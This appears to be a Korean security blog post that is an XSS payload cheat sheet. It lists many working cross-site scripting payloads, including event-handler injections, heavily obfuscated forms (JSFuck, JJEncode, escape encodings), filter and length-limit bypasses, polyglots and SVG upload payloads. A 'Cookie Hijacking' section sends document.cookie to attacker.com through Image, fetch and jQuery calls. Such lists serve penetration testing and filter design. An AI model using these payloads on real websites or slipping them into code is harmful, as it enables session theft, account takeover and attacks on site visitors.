반응형
ி Common Tags
<img src onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<p onmouseover="alert(1)">test</p>
<table background="javascript:alert(1)">
<input type=image src onerror="prompt(1)">
<a href="javascript:var a=''-alert(1)-''">link</a>ி Uncommon Tags
<select autofocus onfocus=alert(1)>
<meter onmouseover=alert(1)></meter>
<frameset><frame src="javascript:alert(1)"></frameset>
<video src onloadstart=alert(1)>
<details open="" ontoggle=confirm(document.cookie)></details>
// hidden input : only on Firefox (when pressed Alt+Shift+X)
<input type="hidden" accesskey="X" onclick="alert(1)">ி Custom Tag
<xss id=x tabindex=1 onfocusin=alert(1)>ி Obfuscation
<a href="javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'">link</a>
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<a href=javascript:\u0061\u006C\u0065\u0072\u0074(1)>link</a>
<a href="javascript:alert(1)">Click</a>
// base64 YWxlcnQoMSk=
// hex alert(1)
// ascii 97,108,101,114,116,40,49,41
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
// JJEncode (http://utf-8.jp/public/jjencode.html)
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
// Jsfuck (http://www.jsfuck.com/)
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()ி Filtering
Dot(.)
document.cookie => document['cookie']DoubleQuote("")
eval("alert(1)") => eval[alert(1)]
location.href="http://www.test.com"; => location.href=/http:\/\/www.test.com/;String
eval(String.fromCharCode(97,108,101,114,116,40,49,41))without ,
eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41))shorten with parseInt("alert",30) == 8680439
eval(8680439..toString(30)+String.fromCharCode(40,49,41))without +
eval(8680439..toString(30).concat(String.fromCharCode(40,49,41)))without ,
eval(8680439..toString(30).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41)))semicolon(;) and Addition operator(+)
'abc'-alert(1)-'def'
'abc'-alert(1)^1&&'normal_string_here'
'abc'-eval[alert(document['cookie'])]^1&&'normal_string_here'*/
// document.location.href = 'abc?param1=haha'-eval[alert(document['cookie'])]^1&&'https://hck.com/';Parentheses( () )
alert`1`
Set.constructor`alert(1)```
// hex encoding
Set.constructor`alert\x281\x29```
// backslash
Set.constructor`alert\`1\````
// SetTimeout
setTimeout`alert\u00281\u0029`
// Function
new Function`alert(1)`
Function`alert(1)```
Function`alert\x281\x29```
Function`alert\`1\````
// DOM Object (top, self, window, parent, frame, globalThis)
top[`alert`]``
window[`alert`]``
top['\141\154\145\162\164']``
window['\x61\x6c\x65\x72\x74']``Quote("", '')
// RegExp Object
alert(/1/)
alert(/1/.source)
eval(atob(/YWxlcnQoMSk=/.source))
[1].find(alert)Quote and Parentheses
// Error Handler
window.onerror=alert,throw 1
// Attribute on HTML Tag with Entity
<svg onload=alert(1)>
<iframe onload=alert(1)>
// append body
_=document.head.outerHTML[0]+document.head.outerHTML[5]+URL
document.body.innerHTML=_[0]+/iframe onload=alert/.source+_[14]+1+_[15]+_[1]
// Symbol.hasInstance
_=URL+0
/alert/.source+_[12]+1+_[13]instanceof{[Symbol.hasInstance]:eval}
// no curly bracket
_=URL+0
Array.prototype[Symbol.hasInstance]=eval,/alert/.source+_[12]+1+_[13]instanceof[]
// no slash
_=URL+!0+!1,Array.prototype[Symbol.hasInstance]=eval,_[19]+_[38]+_[40]+_[33]+_[4]+_[12]+1+_[13]instanceof[]
// Symbol.toPrimitive
Event.prototype[Symbol.toPrimitive]=x=>1,window.onload=alert
// location.search (page.php?0:alert(1)//&...)
Event.prototype[Symbol.toPrimitive]=x=>/javascript:0/.source+location.search,onload=open
// eval with jQuery
Event.prototype[Symbol.toPrimitive]=x=>/alert/.source+[CSS+0][0][12]+1+[CSS+0][0][13],window.onload=$.globalEval
// function to String
location=/javascript:alert/.source+[CSS+0][0][12]+1+[CSS+0][0][13]
// location.search (page.php?0:alert(1)//&...)
location=/javascript:/+0+location.searchNative Function
var a=alert; a(document.cookie);
// document.cookie bypass
var a='alert'; var b='(documen'; var c='t.cooki'; var d='e)'; var e=eval; e(a+b+c+d);
// String bypass
var a=eval; a(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="));
// / bypass
var a='\'; var b=';alert(document.cookie);var z='';
// () bypass
btoa.constructor`alert\x28document.cookie\x29```ி XSS in JS Context
-(confirm)(document.domain)//
; alert(1);//
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//ி div Payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>ி comment
<script>alert(1)<!-- test --></script>ி Length bypass (XSS in 20chars)
<svg/onload=alert``>
<script src=//aa.es>
<script src=//℡㏛.pw>ி Injecting inside HTML tag
" autofocus onfocus=alert(document.domain) x="
<!-- Style events -->
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>ி Loop In a Line
0[x={toString:x=>alert(1)|x}]ி URL Encoding
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>ி Sandbox XSS
<iframe src="data:text/html,<iframe
src=JavaScript:alert(1)>"></iframe>ி Operator
"apple"(alert(1))
"apple"[alert(1)]
"apple";alert(1)
"apple"+alert(1)
"apple"-alert(1)
"apple"*alert(1)
"apple"/alert(1)
"apple"&alert(1)
"apple"^alert(1)
"apple"%alert(1)
// in 연산자 ("은 사용가능하지만 연산자,개행문자 등은 불가능할 경우)
"apple"[alert(1)]in"mango"
"apple"(alert(1))in"mango"ி Character Escape Sequence
<
%3C
< < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
< < < < < <
\x3c \x3C
\u003c \u003Cி Delimiters
%2f : <svg/onload=alert(1)>
%09 : <svg onload=alert(1)>
%0a : <svg
onload=alert(1)>
%0c : <svg
onload=alert(1)>
%0d : <svg
onload=alert(1)>ி Alert Bypass
<SCRIPT> _=alert,_(1)</SCRIPT>
`` //Can be use as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
eval('ale'+'rt(1)')
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
[].constructor.constructor('alert()')()
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
//`alert${indexedDB}`
ி Polyglots
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>ி xss File Upload
<?xml version="1.0" ?>
<html xmlns="http://www.w3.org/1999/xhtml">
<script>alert(1)</script>
</html> Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>ி Attribute Referencing
<img src=//p6.is%0aalert(1)// onerror=eval(decodeURI(src))>
<img src=x:alert(1); onerror=eval(src)>
<img src=http://p6.is onerror=eval(alt) alt=alert(1)>
<img src alt=YWxlcnQoMSk= onerror=eval(atob(alt))>ி Bypass Chrome Auditor
// `로 끝나는 인자의 경우
`><img src onerror=`${alert(1)}
// 연속된 2개의 파라미터
a=<script>"&b=";alert(1)</script>
a=<script>`&b=`-alert(1)</script>
a=<script>"\&b=";alert(1)</script>
// 같은 인자가 2번 표시될 때
a=`;alert(1)</script><script>`ி Whitelist Iframe
<iframe src="http://youtube.com/" srcdoc="<img src onerror=alert(1)>"></iframe>ி Make Redirection
<img src onerror=location=`//www.example.com`>
//meta tag
<meta http-equiv="refresh" content="0; url=http://example.com/">ி Cookie Hijacking
(new Image).src="http://attacker.com/?q=" + document.cookie;
fetch('http://attacker.com/?q=' + document.cookie)
// with jQuery
$.get('https://attacker.com/?q=' + document.cookie)
$.getScript("//attacker.com/?q="+document.cookie)ி Data Wrapper
<script src="data:;base64,YWxlcnQoMSk="></script>
<iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe>
<object data='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+'></object>
<embed src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></embed>ி Variable Make DOM XSS
document.URL
document.referrer
location
location.href
location.search
location.hash
location.pathnameி Bypass History
<a href="javascript://example.kr/%0aalert(1)">click</a>ி A Tag XSS without interaction
// works on chrome
<a href=# name=xss onfocus=alert(1)>
http://p6.is/endpoint?...#xssReference
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- https://blog.p6.is/xss-cheatsheet/
- https://99-99pit.tistory.com/4
- https://medium.com/@man.shum546/xss-payload-2018-5271c5e3bbce
- http://cubalo.github.io/blog/2014/01/04/bypassing-xss-filters-using-data-uris/
- https://www.hahwul.com/2018/03/29/bypass-xss-protection-event-handler/
- https://blog.rubiya.kr/index.php/2019/03/28/browsers-xss-filter-bypass-cheat-sheet/
- https://jjadmin.tistory.com/24
반응형
'해킹-보안' 카테고리의 다른 글
| xss-game level6 (0) | 2021.04.06 |
|---|---|
| CSP(Content-Security-Policy) (0) | 2021.03.19 |
| 구글 해킹(Google Dorks) (0) | 2021.02.28 |
| XSS 화이트리스트 소스코드 (0) | 2021.02.26 |
| XSS(Cross-Site Scripting) 테스트 앱 (0) | 2021.02.23 |
